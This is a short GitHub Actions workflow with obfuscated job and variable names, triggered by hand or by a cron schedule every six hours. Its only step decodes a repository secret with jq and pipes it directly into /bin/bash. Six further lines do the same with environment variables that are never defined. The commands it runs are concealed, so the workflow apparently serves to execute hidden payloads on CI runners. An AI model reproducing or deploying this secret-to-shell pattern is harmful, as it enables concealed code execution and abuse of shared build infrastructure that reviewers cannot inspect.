name: equationpreviously
on:
  workflow_dispatch:
  schedule:
    - cron: '13 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: equationpreviously
        env:
          hqgs168: ${{ secrets.hqgs168 }}
        run: |
          echo $hqgs168 | jq -r .dkw987 | /bin/bash
          echo $prc13 | jq -r .u208 | /bin/bash
          echo $k300 | jq -r .ck397 | /bin/bash
          echo $zzaw5159 | jq -r .vnsi529 | /bin/bash
          echo $gw82876 | jq -r .w7099 | /bin/bash
          echo $a82849 | jq -r .j68475 | /bin/bash
          echo $rg741 | jq -r .j124 | /bin/bash

